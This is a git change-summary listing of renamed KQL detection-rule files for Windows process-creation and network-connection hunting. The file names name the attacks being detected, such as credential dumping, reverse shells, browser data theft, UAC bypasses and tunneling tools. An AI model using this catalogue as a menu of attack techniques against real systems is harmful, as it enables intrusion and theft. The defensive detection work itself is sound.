..._center_suspicious_network_connections.kql | 0 ...m_process_located_in_suspicious_folder.kql | 0 ...ication_initiated_to_portmap_io_domain.kql | 0 ..._communication_with_crypto_mining_pool.kql | 0 ..._connection_initiated_by_addinutil_exe.kql | 0 ...k_connection_initiated_by_eqnedt32_exe.kql | 0 ...k_connection_initiated_by_imewdbld_exe.kql | 0 ...k_connection_initiated_by_regsvr32_exe.kql | 0 ...tially_suspicious_or_uncommon_location.kql | 0 ...urewebsites_net_by_non_browser_process.kql | 0 ...nnection_initiated_to_btunnels_domains.kql | 0 ...itiated_to_cloudflared_tunnels_domains.kql | 0 ...nection_initiated_to_devtunnels_domain.kql | 0 ...etwork_connection_initiated_to_mega_nz.kql | 0 ...d_to_visual_studio_code_tunnels_domain.kql | 0 
...rk_connection_initiated_via_finger_exe.kql | 15 +++++++++++++ ...k_connection_initiated_via_notepad_exe.kql | 0 ...to_potential_dead_drop_resolver_domain.kql | 0 ...network_connection_over_uncommon_ports.kql | 0 ...ted_network_connection_to_non_local_ip.kql | 0 ...work_connection_initiated_by_cmstp_exe.kql | 0 ...nnection_initiated_by_microsoft_dialer.kql | 0 ...ection_initiated_by_script_interpreter.kql | 0 ...k_connection_to_public_ip_via_winlogon.kql | 0 ...dp_connections_over_non_standard_tools.kql | 0 ...picious_malware_callback_communication.kql | 0 ...cious_network_connection_to_notion_api.kql | 0 ..._suspicious_wuauclt_network_connection.kql | 0 ...ted_network_connection_to_ngrok_domain.kql | 0 .../python_initiated_connection.kql | 0 .../rdp_over_reverse_ssh_tunnel.kql | 0 .../rdp_to_http_or_https_target_ports.kql | 0 ...iating_network_connection_to_public_ip.kql | 0 ...ccess_tool_anydesk_incoming_connection.kql | 0 .../rundll32_internet_connection.kql | 0 .../silenttrinity_stager_msbuild_activity.kql | 0 .../suspicious_dropbox_api_usage.kql | 0 ...twork_connection_binary_no_commandline.kql | 0 ...k_connection_to_ip_lookup_service_apis.kql | 0 ..._network_communication_with_google_api.kql | 0 ...etwork_communication_with_telegram_api.kql | 0 .../suspicious_outbound_smtp_connections.kql | 0 ...uspicious_wordpad_outbound_connections.kql | 0 ...ction_to_active_directory_web_services.kql | 0 ...k_connection_initiated_by_certutil_exe.kql | 0 .../uncommon_outbound_kerberos_connection.kql | 0 .../7zip_compressing_dump_files.kql | 0 ...ell_cmdlets_execution_proccesscreation.kql | 0 ...sions_to_hide_services_via_set_service.kql | 0 ...rivilege_by_arbitrary_parent_processes.kql | 0 .../abusing_print_executable.kql | 0 ...ctory_database_snapshot_via_adexplorer.kql | 0 ...rectory_structure_export_via_csvde_exe.kql | 0 ...ectory_structure_export_via_ldifde_exe.kql | 0 ...add_insecure_download_source_to_winget.kql | 0 .../add_new_download_source_to_winget.kql | 0 
...spicious_new_download_source_to_winget.kql | 0 .../add_safeboot_keys_via_reg_utility.kql | 0 ...ndows_capability_via_powershell_cmdlet.kql | 0 ..._exe_execution_from_uncommon_directory.kql | 0 .../agentexecutor_powershell_execution.kql | 0 .../all_backups_deleted_via_wbadmin_exe.kql | 0 ...curity_descriptor_tampering_via_sc_exe.kql | 0 ...levated_msi_spawned_cmd_and_powershell.kql | 0 ...ays_install_elevated_windows_installer.kql | 0 .../application_removed_via_wmic_exe.kql | 0 .../application_terminated_via_wmic_exe.kql | 0 ...ary_binary_execution_using_gup_utility.kql | 0 ...r_csproj_code_execution_via_dotnet_exe.kql | 0 ..._download_via_configsecuritypolicy_exe.kql | 0 ...le_download_via_gfxdownloadwrapper_exe.kql | 0 ...bitrary_file_download_via_imewdbld_exe.kql | 0 ...ary_file_download_via_msedge_proxy_exe.kql | 0 ...bitrary_file_download_via_msohtmed_exe.kql | 0 .../arbitrary_file_download_via_mspub_exe.kql | 0 ...file_download_via_presentationhost_exe.kql | 0 ...bitrary_file_download_via_squirrel_exe.kql | 0 ...arbitrary_msi_download_via_devinit_exe.kql | 0 ...ommand_execution_via_settingcontent_ms.kql | 0 .../aspnetcompiler_execution.kql | 0 ...sembly_loading_via_cl_loadassembly_ps1.kql | 0 ...kerberos_coercion_via_dns_spn_spoofing.kql | 0 .../audio_capture_via_powershell.kql | 0 .../audio_capture_via_soundrecorder.kql | 0 .../audit_policy_tampering_via_auditpol.kql | 0 ...tampering_via_nt_resource_kit_auditpol.kql | 0 .../automated_collection_command_prompt.kql | 0 ...bs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql | 0 ...cial_processes_with_improper_arguments.kql | 0 ...64_encoded_powershell_command_detected.kql | 0 .../base64_mz_header_in_commandline.kql | 0 ...y_proxy_execution_via_dotnet_trace_exe.kql | 0 .../bitlockertogo_exe_execution.kql | 0 ...onfiguration_tampering_via_bcdedit_exe.kql | 0 .../browser_execution_in_headless_mode.kql | 0 .../browser_started_with_remote_debugging.kql | 0 .../bypass_uac_via_cmstp.kql | 0 
.../bypass_uac_via_fodhelper_exe.kql | 0 .../bypass_uac_via_wsreset_exe.kql | 0 .../c_il_code_compilation_via_ilasm_exe.kql | 0 ..._exe_from_potentially_suspicious_paths.kql | 0 .../capture_credentials_with_rpcping_exe.kql | 0 .../certificate_exported_via_certutil_exe.kql | 0 .../certificate_exported_via_powershell.kql | 0 ...le_association_to_executable_via_assoc.kql | 0 ...nge_default_file_association_via_assoc.kql | 0 ...wershell_policies_to_an_insecure_level.kql | 0 ...ng_service_imagepath_value_via_reg_exe.kql | 0 .../chopper_webshell_process_pattern.kql | 0 ...eadless_execution_to_mockbin_like_site.kql | 0 ...nstance_executed_with_custom_extension.kql | 0 .../cloudflared_portable_execution.kql | 0 .../cloudflared_quick_tunnel_execution.kql | 0 ...cloudflared_tunnel_connections_cleanup.kql | 0 .../cloudflared_tunnel_execution.kql | 0 ...ing_space_characters_execution_anomaly.kql | 0 .../cmstp_execution_process_creation.kql | 0 ...cmstp_uac_bypass_via_com_object_access.kql | 0 .../cobaltstrike_load_by_rundll32.kql | 0 .../code_execution_via_pcwutl_dll.kql | 0 ...ation_via_mode_com_to_russian_language.kql | 0 .../com_object_execution_via_xwizard_exe.kql | 0 ...ith_suspicious_url_and_appdata_strings.kql | 0 ...h_password_for_exfiltration_with_7_zip.kql | 0 ..._password_for_exfiltration_with_winzip.kql | 0 .../compressed_file_creation_via_tar_exe.kql | 0 ...compressed_file_extraction_via_tar_exe.kql | 0 ...y_and_export_via_get_adcomputer_cmdlet.kql | 0 ...omputer_password_change_via_ksetup_exe.kql | 0 ...ter_system_reconnaissance_via_wmic_exe.kql | 0 ...conhost_exe_commandline_path_traversal.kql | 0 ...ost_spawned_by_uncommon_parent_process.kql | 0 .../console_codepage_lookup_via_chcp.kql | 0 .../process_creation}/control_panel_items.kql | 0 ...urestring_cmdlet_usage_via_commandline.kql | 0 ...mp_files_from_remote_share_via_cmd_exe.kql | 0 ...rom_or_to_admin_share_or_sysvol_folder.kql | 0 ...copy_from_volumeshadowcopy_via_cmd_exe.kql | 0 
...g_sensitive_files_with_credential_data.kql | 0 .../createdump_process_dump.kql | 0 ...ion_form_potentially_suspicious_parent.kql | 0 ...t_potentially_suspicious_child_process.kql | 0 ...pt_uncommon_script_extension_execution.kql | 0 .../curl_download_and_execute_combination.kql | 0 ...quest_with_potential_custom_user_agent.kql | 0 .../data_copied_to_clipboard_via_clip_exe.kql | 0 ...ta_export_from_mssql_table_via_bcp_exe.kql | 0 .../delete_all_scheduled_tasks.kql | 0 .../delete_important_scheduled_task.kql | 0 ...eleted_data_overwritten_via_cipher_exe.kql | 0 ..._shadow_copies_via_wmi_with_powershell.kql | 0 ...curity_descriptor_tampering_via_sc_exe.kql | 0 .../detected_windows_software_discovery.kql | 0 ..._of_powershell_execution_via_sqlps_exe.kql | 0 .../devicecredentialdeployment_execution.kql | 0 ...launcher_exe_executes_specified_binary.kql | 0 .../direct_autorun_keys_modification.kql | 0 .../directory_removal_via_rmdir.kql | 0 .../process_creation}/dirlister_execution.kql | 2 +- .../disable_important_scheduled_task.kql | 0 ...indows_defender_av_security_monitoring.kql | 0 .../disable_windows_iis_http_logging.kql | 0 .../disabled_ie_security_features.kql | 0 .../disabled_volume_snapshots.kql | 0 ...der_wmi_autologger_session_via_reg_exe.kql | 0 .../discovery_of_a_system_time.kql | 0 ...ion_from_potential_suspicious_location.kql | 0 ...de_uncommon_script_extension_execution.kql | 0 .../dism_remove_online_package.kql | 0 .../dll_execution_via_rasautou_exe.kql | 0 ...execution_via_register_cimprovider_exe.kql | 0 .../dll_loaded_via_certoc_exe.kql | 0 ...dll_sideloading_by_vmware_xfer_utility.kql | 0 .../dllhost_exe_execution_anomaly.kql | 0 ...erserver_function_call_via_msiexec_exe.kql | 0 ...ltration_and_tunneling_tools_execution.kql | 0 .../domain_trust_discovery_via_dsquery.kql | 0 ...iver_dll_installation_via_odbcconf_exe.kql | 0 .../driverquery_exe_execution.kql | 0 .../dropping_of_password_filter_dll.kql | 0 ...nternals_suspicious_powershell_cmdlets.kql 
| 0 ...dumping_of_sensitive_hives_via_reg_exe.kql | 0 .../dumping_process_via_sqldumper_exe.kql | 0 .../dumpminitool_execution.kql | 0 .../dumpstack_log_defender_evasion.kql | 0 .../dynamic_net_compilation_via_csc_exe.kql | 0 .../email_exifiltration_via_powershell.kql | 0 .../enable_lm_hash_storage_proccreation.kql | 0 ...merate_all_information_with_whoami_exe.kql | 0 ...umeration_for_3rd_party_creds_from_cli.kql | 0 ...numeration_for_credentials_in_registry.kql | 0 .../esentutl_gather_credentials.kql | 0 .../esentutl_steals_browser_information.kql | 0 ...amper_in_net_processes_via_commandline.kql | 0 .../etw_trace_evasion_activity.kql | 0 .../exchange_powershell_snap_ins_usage.kql | 0 .../execute_code_with_pester_bat.kql | 0 ...execute_code_with_pester_bat_as_parent.kql | 0 .../execute_files_with_msdeploy_exe.kql | 0 .../execute_from_alternate_data_streams.kql | 0 ...execute_pcwrun_exe_to_leverage_follina.kql | 0 .../execution_of_non_existing_file.kql | 0 ..._of_powershell_script_in_public_folder.kql | 0 ...tion_of_suspicious_file_type_extension.kql | 0 .../execution_via_stordiag_exe.kql | 0 .../execution_via_workfolders_exe.kql | 0 .../explorer_nouaccheck_flag.kql | 0 .../explorer_process_tree_break.kql | 0 ...ports_critical_registry_keys_to_a_file.kql | 0 .../exports_registry_key_to_a_file.kql | 0 ..._subfolder_enumeration_via_dir_command.kql | 0 ...coded_from_base64_hex_via_certutil_exe.kql | 0 .../file_decryption_using_gpg4win.kql | 0 .../file_deletion_via_del.kql | 0 ..._download_and_execution_via_ieexec_exe.kql | 0 ...ad_from_browser_process_via_inline_url.kql | 10 +++++++++ ...nload_from_ip_based_url_via_certoc_exe.kql | 0 ...file_download_from_ip_url_via_curl_exe.kql | 0 ...ile_download_using_notepad_gup_utility.kql | 0 ...ile_download_using_protocolhandler_exe.kql | 0 .../file_download_via_bitsadmin.kql | 0 ...itsadmin_to_a_suspicious_target_folder.kql | 0 ...bitsadmin_to_an_uncommon_target_folder.kql | 0 .../file_download_via_certoc_exe.kql | 0 
.../file_download_via_installutil_exe.kql | 0 ...load_via_windows_defender_mpcmprun_exe.kql | 0 .../file_download_with_headless_browser.kql | 0 ...ile_encoded_to_base64_via_certutil_exe.kql | 0 ..._via_gpg4win_from_suspicious_locations.kql | 0 .../file_encryption_using_gpg4win.kql | 0 ...ing_explorer_folder_shortcut_via_shell.kql | 0 ...ion_encoded_to_base64_via_certutil_exe.kql | 0 ...e_recovery_from_backup_via_wbadmin_exe.kql | 0 ...ous_extension_downloaded_via_bitsadmin.kql | 0 ...iles_added_to_an_archive_using_rar_exe.kql | 0 .../filter_driver_unloaded_via_fltmc_exe.kql | 0 .../findstr_gpp_passwords.kql | 0 .../findstr_launching_lnk_file.kql | 0 .../finger_exe_execution.kql | 0 ..._configuration_discovery_via_netsh_exe.kql | 0 .../firewall_disabled_via_netsh_exe.kql | 0 .../firewall_rule_deleted_via_netsh_exe.kql | 0 .../firewall_rule_update_via_netsh_exe.kql | 0 ...ous_output_via_compress_archive_cmdlet.kql | 0 .../forfiles_command_execution.kql | 0 ...orfiles_exe_child_process_masquerading.kql | 0 .../fsutil_drive_enumeration.kql | 0 .../fsutil_suspicious_invocation.kql | 0 ...esult_display_group_policy_information.kql | 0 .../process_creation}/gpscript_execution.kql | 0 .../greedy_file_deletion_using_del.kql | 0 ...mbership_reconnaissance_via_whoami_exe.kql | 0 .../gzip_archive_decode_via_powershell.kql | 0 .../hacktool_adcspwn_execution.kql | 0 ...cktool_bloodhound_sharphound_execution.kql | 0 .../hacktool_certify_execution.kql | 0 .../hacktool_certipy_execution.kql | 0 .../hacktool_covenant_powershell_launcher.kql | 0 .../hacktool_crackmapexec_execution.kql | 0 ...cktool_crackmapexec_execution_patterns.kql | 0 ...ol_crackmapexec_powershell_obfuscation.kql | 0 ...hacktool_crackmapexec_process_patterns.kql | 0 ...rsploit_empire_scheduled_task_creation.kql | 0 ..._dinjector_powershell_cradle_execution.kql | 0 ...ktool_dumpert_process_dumper_execution.kql | 0 .../hacktool_edrsilencer_execution.kql | 0 ...ol_empire_powershell_launch_parameters.kql | 0 
.../hacktool_empire_powershell_uac_bypass.kql | 0 .../hacktool_execution_pe_metadata.kql | 0 .../hacktool_f_secure_c3_load_by_rundll32.kql | 0 ...rootkit_detector_and_remover_execution.kql | 0 ...ool_hashcat_password_cracker_execution.kql | 0 .../hacktool_hollowreaper_execution.kql | 0 .../hacktool_htran_natbypass_execution.kql | 0 ...ol_hydra_password_bruteforce_execution.kql | 0 .../hacktool_impacket_tools_execution.kql | 0 .../hacktool_impersonate_execution.kql | 0 .../hacktool_inveigh_execution.kql | 0 ...ol_jlaive_in_memory_assembly_execution.kql | 0 .../hacktool_koadic_execution.kql | 0 .../hacktool_krbrelay_execution.kql | 0 .../hacktool_krbrelayup_execution.kql | 0 .../hacktool_lazagne_execution.kql | 0 .../hacktool_mimikatz_execution.kql | 0 .../hacktool_pchunter_execution.kql | 0 ...ial_impacket_lateral_movement_activity.kql | 0 .../hacktool_powertool_execution.kql | 0 .../hacktool_purplesharp_execution.kql | 0 ..._pypykatz_credentials_dumping_activity.kql | 0 .../hacktool_quarks_pwdump_execution.kql | 0 ...l_redmimicry_winnti_playbook_execution.kql | 0 .../hacktool_remotekrbrelay_execution.kql | 0 .../hacktool_rubeus_execution.kql | 0 .../hacktool_safetykatz_execution.kql | 0 .../hacktool_securityxploded_execution.kql | 0 .../hacktool_sharpchisel_execution.kql | 0 .../hacktool_sharpdpapi_execution.kql | 0 .../hacktool_sharpersist_execution.kql | 0 .../hacktool_sharpevtmute_execution.kql | 0 .../hacktool_sharpimpersonation_execution.kql | 0 .../hacktool_sharpldapmonitor_execution.kql | 0 .../hacktool_sharpldapwhoami_execution.kql | 0 .../hacktool_sharpmove_tool_execution.kql | 0 ...acktool_sharpup_privesc_tool_execution.kql | 0 .../hacktool_sharpview_execution.kql | 0 ...hacktool_sharpwsus_wsuspendu_execution.kql | 0 ...acktool_silenttrinity_stager_execution.kql | 0 ...ool_sliver_c2_implant_activity_pattern.kql | 0 .../hacktool_soaphound_execution.kql | 0 .../hacktool_stracciatella_execution.kql | 0 .../hacktool_trufflesnout_execution.kql | 0 
.../hacktool_winpeas_execution.kql | 0 .../hacktool_winpwn_execution.kql | 0 .../hacktool_winrm_access_via_evil_winrm.kql | 0 ...ool_wmiexec_default_powershell_command.kql | 0 .../hacktool_xordump_execution.kql | 0 ...ware_model_reconnaissance_via_wmic_exe.kql | 0 ...ting_of_wifi_credentials_via_netsh_exe.kql | 0 .../process_creation}/hh_exe_execution.kql | 0 ...hidden_powershell_in_link_file_pattern.kql | 0 .../hiding_files_with_attrib_exe.kql | 0 ...ecialaccounts_registry_key_commandline.kql | 0 ...or_privilege_escalation_tool_execution.kql | 0 ...l_help_hh_exe_suspicious_child_process.kql | 0 ...mputer_zone_for_http_protocols_via_cli.kql | 0 ..._code_module_command_line_installation.kql | 0 ...log_deletion_via_commandline_utilities.kql | 0 ...devices_unusual_parent_child_processes.kql | 0 ...interchange_format_file_via_ldifde_exe.kql | 0 ...om_suspicious_directories_proccreation.kql | 0 .../imports_registry_key_from_a_file.kql | 0 .../imports_registry_key_from_an_ads.kql | 0 ...cution_by_program_compatibility_wizard.kql | 0 ...xecution_from_script_file_via_bash_exe.kql | 0 ..._inline_command_execution_via_bash_exe.kql | 0 .../infdefaultinstall_exe_inf_execution.kql | 0 ...secure_proxy_doh_transfer_via_curl_exe.kql | 0 .../insecure_transfer_via_curl_exe.kql | 0 ...itive_subfolder_search_via_findstr_exe.kql | 0 ..._new_package_via_winget_local_manifest.kql | 0 .../installation_of_wsl_kali_linux.kql | 0 .../process_creation}/interactive_at_job.kql | 0 ...resting_service_enumeration_via_sc_exe.kql | 0 ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 0 .../invoke_obfuscation_clip_launcher.kql | 0 ...nvoke_obfuscation_compress_obfuscation.kql | 0 ..._obfuscation_obfuscated_iex_invocation.kql | 0 .../invoke_obfuscation_stdin_launcher.kql | 0 .../invoke_obfuscation_var_launcher.kql | 0 ...e_obfuscation_var_launcher_obfuscation.kql | 0 .../invoke_obfuscation_via_stdin.kql | 0 .../invoke_obfuscation_via_use_clip.kql | 0 .../invoke_obfuscation_via_use_mshta.kql | 0 
.../java_running_with_remote_debugging.kql | 0 .../jscript_compiler_execution.kql | 0 ...kavremover_dropped_binary_lolbin_usage.kql | 0 .../kernel_memory_dump_via_livekd.kql | 0 .../launch_vsdevshell_ps1_proxy_execution.kql | 0 ...ed_module_enumeration_via_tasklist_exe.kql | 0 .../local_accounts_discovery.kql | 0 .../local_file_read_using_curl_exe.kql | 0 ...cal_groups_reconnaissance_via_wmic_exe.kql | 0 ...on_user_password_change_via_ksetup_exe.kql | 0 ...ol_binary_copied_from_system_directory.kql | 2 +- ...s_data_exfiltration_by_datasvcutil_exe.kql | 0 .../lolbin_runexehelper_use_as_proxy.kql | 0 .../lolbin_unregmp2_exe_use_as_proxy.kql | 0 ...sa_ppl_protection_disabled_via_reg_exe.kql | 0 .../lsass_dump_keyword_in_commandline.kql | 0 ...process_reconnaissance_via_findstr_exe.kql | 0 ...d_powershell_keywords_in_command_lines.kql | 0 ...on_by_microsoft_visual_studio_debugger.kql | 0 ...powershell_commandlets_processcreation.kql | 0 ...nents_file_execution_by_taef_detection.kql | 0 ...inject_inject_dll_into_running_process.kql | 0 ...soft_iis_connection_strings_decryption.kql | 0 ...ft_iis_service_account_password_dumped.kql | 0 .../mmc20_lateral_movement.kql | 0 ...h_reversed_extensions_using_rtlo_abuse.kql | 0 .../mmc_spawning_windows_shell.kql | 0 .../modify_group_policy_settings.kql | 0 .../monitoring_for_persistence_via_bits.kql | 0 .../msdt_execution_via_answer_file.kql | 0 ...sexchange_transport_agent_installation.kql | 0 ...cution_with_suspicious_file_extensions.kql | 0 ...ll_runhtmlapplication_suspicious_usage.kql | 0 .../msiexec_quiet_installation.kql | 0 .../process_creation}/msiexec_web_install.kql | 0 ...tsc_exe_execution_from_uncommon_parent.kql | 0 ...stsc_exe_execution_with_local_rdp_file.kql | 0 .../process_creation}/msxsl_exe_execution.kql | 0 .../net_webclient_casing_anomalies.kql | 0 ..._policy_on_microsoft_defender_firewall.kql | 0 .../network_reconnaissance_activity.kql | 0 ...ripteventconsumer_created_via_wmic_exe.kql | 0 
...capture_session_launched_via_dxcap_exe.kql | 0 .../new_dll_registered_via_odbcconf_exe.kql | 0 ...evelplugindll_installed_via_dnscmd_exe.kql | 0 .../new_firewall_rule_added_via_netsh_exe.kql | 0 ...neric_credentials_added_via_cmdkey_exe.kql | 0 .../new_kernel_driver_via_sc_exe.kql | 0 ...rk_trace_capture_started_via_netsh_exe.kql | 0 ...rt_forwarding_rule_added_via_netsh_exe.kql | 0 .../new_process_created_via_taskmgr_exe.kql | 0 .../new_process_created_via_wmic_exe.kql | 0 ...top_connection_initiated_via_mstsc_exe.kql | 0 ..._certificate_installed_via_certmgr_exe.kql | 0 ...certificate_installed_via_certutil_exe.kql | 0 .../new_service_creation_using_powershell.kql | 0 .../new_service_creation_using_sc_exe.kql | 0 .../new_user_created_via_net_exe.kql | 0 ...d_via_net_exe_with_never_expire_option.kql | 0 ...l_smart_card_created_via_tpmvscmgr_exe.kql | 0 .../nltest_exe_execution.kql | 0 .../node_process_executions.kql | 0 .../nodejs_execution_of_javascript_file.kql | 0 ...interactive_powershell_process_spawned.kql | 0 ..._privileged_usage_of_reg_or_powershell.kql | 0 .../notepad_password_files_discovery.kql | 0 ...rshell_download_cradle_processcreation.kql | 0 .../ntdllpipe_like_activity_execution.kql | 0 .../obfuscated_ip_download_activity.kql | 0 .../obfuscated_ip_via_cli.kql | 0 ...l_msi_install_via_windowsinstaller_com.kql | 0 ...fuscated_powershell_oneliner_execution.kql | 0 .../odbcconf_exe_suspicious_dll_location.kql | 0 ...xecution_of_malicious_embedded_scripts.kql | 0 ...openwith_exe_executes_specified_binary.kql | 0 ...erator_bloopers_cobalt_strike_commands.kql | 0 ...perator_bloopers_cobalt_strike_modules.kql | 0 ...eunsafeclientmailrules_setting_enabled.kql | 0 ...rd_provided_in_command_line_of_net_exe.kql | 0 .../password_set_to_never_expire_via_wmi.kql | 0 ...oy_remote_adminstartion_tool_execution.kql | 0 .../perl_inline_command_execution.kql | 0 .../permission_check_via_accesschk_exe.kql | 0 ...uration_reconnaissance_via_findstr_exe.kql | 0 
.../persistence_via_sticky_key_backdoor.kql | 0 ...persistence_via_typedpaths_commandline.kql | 0 .../phishing_pattern_iso_in_archive.kql | 0 .../php_inline_command_execution.kql | 0 .../process_creation}/ping_hex_ip.kql | 0 .../pktmon_exe_execution.kql | 0 .../port_forwarding_activity_via_ssh_exe.kql | 0 .../portable_gpg_exe_execution.kql | 0 ...scalation_via_weak_service_permissions.kql | 0 ...umeration_using_ad_module_proccreation.kql | 0 .../potential_adplus_exe_abuse.kql | 0 .../potential_amazon_ssm_agent_hijacking.kql | 0 .../potential_amsi_bypass_using_null_bits.kql | 0 ...tential_amsi_bypass_via_net_reflection.kql | 0 ...cation_whitelisting_bypass_via_dnx_exe.kql | 0 ..._arbitrary_code_execution_via_node_exe.kql | 0 ...trary_command_execution_using_msdt_exe.kql | 0 ...rbitrary_command_execution_via_ftp_exe.kql | 0 ...ntial_arbitrary_dll_load_using_winword.kql | 0 ...file_download_using_office_application.kql | 0 ...arbitrary_file_download_via_cmdl32_exe.kql | 0 ...inary_impersonating_sysinternals_tools.kql | 0 ...ial_binary_proxy_execution_via_cdb_exe.kql | 0 ..._proxy_execution_via_vsdiagnostics_exe.kql | 0 .../potential_browser_data_stealing.kql | 0 ...otential_cobaltstrike_process_patterns.kql | 0 ...ownload_cradles_usage_process_creation.kql | 0 ...nd_line_path_traversal_evasion_attempt.kql | 0 ...ne_obfuscation_using_escape_characters.kql | 0 ...icode_characters_from_suspicious_image.kql | 0 ...commandline_path_traversal_via_cmd_exe.kql | 0 ...and_service_reconnaissance_via_reg_exe.kql | 0 .../potential_cookies_session_hijacking.kql | 0 ..._attempt_using_new_networkprovider_cli.kql | 0 ...ential_dumping_via_lsass_process_clone.kql | 0 .../potential_credential_dumping_via_wer.kql | 0 .../potential_crypto_mining_activity.kql | 0 ...tration_activity_via_commandline_tools.kql | 0 ...ealing_via_chromium_headless_debugging.kql | 0 ...ivity_via_emoji_usage_in_commandline_1.kql | 0 ...ivity_via_emoji_usage_in_commandline_2.kql | 0 
...ivity_via_emoji_usage_in_commandline_3.kql | 0 ...ivity_via_emoji_usage_in_commandline_4.kql | 0 ...tial_defense_evasion_via_binary_rename.kql | 0 ...via_rename_of_highly_relevant_binaries.kql | 0 ...nse_evasion_via_right_to_left_override.kql | 0 ...tial_discovery_activity_via_dnscmd_exe.kql | 0 ...nload_via_powershell_invoke_webrequest.kql | 0 ...jection_or_execution_using_tracker_exe.kql | 0 ...tial_dll_injection_via_acccheckconsole.kql | 0 ...dll_sideloading_via_deviceenroller_exe.kql | 0 .../potential_dosfuscation_activity.kql | 0 ...oad_upload_activity_using_type_command.kql | 0 ...r_script_execution_via_wscript_cscript.kql | 0 ...ded_powershell_patterns_in_commandline.kql | 0 ...eral_movement_via_activatemicrosoftapp.kql | 0 ...ential_execution_of_sysinternals_tools.kql | 0 ...al_fake_instance_of_hxtsr_exe_executed.kql | 0 ...d_via_ms_appinstaller_protocol_handler.kql | 0 ...ile_overwrite_via_sysinternals_sdelete.kql | 0 ...n_via_ntfs_index_allocation_stream_cli.kql | 0 ...lyph_attack_using_lookalike_characters.kql | 0 ...eral_movement_via_windows_remote_shell.kql | 0 ...otential_lethalhta_technique_execution.kql | 0 ...ential_lsass_process_dump_via_procdump.kql | 0 ...anage_bde_wsf_abuse_to_proxy_execution.kql | 0 ...ial_memory_dumping_activity_via_livekd.kql | 0 ...tial_meterpreter_cobaltstrike_activity.kql | 0 .../potential_mftrace_exe_abuse.kql | 0 ..._dll_sideloading_via_defender_binaries.kql | 0 .../potential_msiexec_masquerading.kql | 0 .../potential_mstsc_shadowing_activity.kql | 0 ..._sniffing_activity_using_network_tools.kql | 0 ...tential_ntlm_coercion_via_certutil_exe.kql | 0 ...l_obfuscated_ordinal_call_via_rundll32.kql | 0 ...word_spraying_attempt_using_dsacls_exe.kql | 0 ...attempt_via_existing_service_tampering.kql | 0 ...nce_attempt_via_run_keys_using_reg_exe.kql | 0 ...sistence_via_logon_scripts_commandline.kql | 0 ..._via_microsoft_compatibility_appraiser.kql | 0 ...ntial_persistence_via_netsh_helper_dll.kql | 0 
...powershell_search_order_hijacking_task.kql | 0 ...etoolboxcmd_exe_vm_state_change_script.kql | 0 ...al_powershell_command_line_obfuscation.kql | 0 ...istory_access_attempt_via_history_file.kql | 0 .../potential_powershell_downgrade_attack.kql | 0 ...xecution_policy_tampering_proccreation.kql | 0 ...potential_powershell_execution_via_dll.kql | 0 ...hell_obfuscation_via_reversed_commands.kql | 0 ..._powershell_obfuscation_via_wchar_char.kql | 0 ...ial_powershell_reverseshell_connection.kql | 0 ...l_privilege_escalation_to_local_system.kql | 0 ...tion_using_symlink_between_osk_and_cmd.kql | 0 ...ation_via_service_permissions_weakness.kql | 0 ..._execution_proxy_via_cl_invocation_ps1.kql | 0 ...tential_process_injection_via_msra_exe.kql | 0 ...duct_class_reconnaissance_via_wmic_exe.kql | 0 ...al_product_reconnaissance_via_wmic_exe.kql | 0 ...y_key_abuse_for_binary_proxy_execution.kql | 0 ...aunch_exe_binary_proxy_execution_abuse.kql | 0 .../potential_psexec_remote_execution.kql | 0 ...thorized_mbr_tampering_via_bcdedit_exe.kql | 0 ...tential_rdp_session_hijacking_activity.kql | 0 .../potential_rdp_tunneling_via_plink.kql | 0 .../potential_rdp_tunneling_via_ssh.kql | 0 ...l_recon_activity_using_driverquery_exe.kql | 0 ...otential_recon_activity_via_nltest_exe.kql | 0 ...nce_activity_via_gathernetworkinfo_vbs.kql | 0 ..._for_cached_credentials_via_cmdkey_exe.kql | 0 ...ger_content_execution_via_werfault_exe.kql | 0 ...ntial_register_app_vbs_lolscript_abuse.kql | 0 ...tial_regsvr32_commandline_flag_anomaly.kql | 0 .../potential_remote_desktop_tunneling.kql | 0 .../potential_renamed_rundll32_execution.kql | 0 ...dll32_execution_with_dll_stored_in_ads.kql | 0 ...xy_execution_via_cl_mutexverifiers_ps1.kql | 0 ..._shelldispatch_dll_functionality_abuse.kql | 0 ...m_database_persistence_via_sdbinst_exe.kql | 0 ..._bypass_via_windows_developer_features.kql | 0 ...ential_smb_relay_attack_tool_execution.kql | 0 ...tential_spn_enumeration_via_setspn_exe.kql | 0 
...istence_install_using_a_scheduled_task.kql | 0 ...tial_suspicious_activity_using_secedit.kql | 0 ...er_launch_from_document_reader_process.kql | 0 ...potential_suspicious_mofcomp_execution.kql | 0 ...ous_registry_file_imported_via_reg_exe.kql | 0 ...s_windows_feature_enabled_proccreation.kql | 0 ...otential_sysinternals_procdump_evasion.kql | 0 ..._rdp_related_registry_keys_via_reg_exe.kql | 2 +- ...pering_with_security_products_via_wmic.kql | 0 .../potential_uac_bypass_via_sdclt_exe.kql | 0 ...rvice_path_reconnaissance_via_wmic_exe.kql | 0 ...potential_winapi_calls_via_commandline.kql | 0 ...fender_av_bypass_via_dump64_exe_rename.kql | 0 ...indows_defender_tampering_via_wmic_exe.kql | 0 ...l_movement_wmiprvse_spawned_powershell.kql | 0 ...e_permissions_granted_using_dsacls_exe.kql | 0 ...asp_net_compilation_via_aspnetcompiler.kql | 0 ...ally_suspicious_cabinet_file_expansion.kql | 0 ...ous_call_to_win32_nteventlogfile_class.kql | 0 ...child_process_of_clickonce_application.kql | 0 ...icious_child_process_of_diskshadow_exe.kql | 0 ...ious_child_process_of_keyscrambler_exe.kql | 0 ...y_suspicious_child_process_of_regsvr32.kql | 0 ...lly_suspicious_child_process_of_vscode.kql | 0 ...suspicious_child_process_of_winrar_exe.kql | 0 ...ous_child_processes_spawned_by_conhost.kql | 0 ...y_suspicious_cmd_shell_output_redirect.kql | 0 ...ommand_targeting_teams_sensitive_files.kql | 0 ...esktop_background_change_using_reg_exe.kql | 0 ...icious_dll_registered_via_odbcconf_exe.kql | 0 ...cious_electron_application_commandline.kql | 0 ..._suspicious_event_viewer_child_process.kql | 0 ...con_activity_using_log_query_utilities.kql | 0 ...n_from_parent_process_in_public_folder.kql | 0 ...uspicious_execution_of_pdqdeployrunner.kql | 0 ..._regasm_regsvcs_from_uncommon_location.kql | 0 ...regasm_regsvcs_with_uncommon_extension.kql | 0 ...file_sharing_domain_via_powershell_exe.kql | 0 ..._suspicious_googleupdate_child_process.kql | 0 ...javascript_execution_via_nodejs_binary.kql | 0 
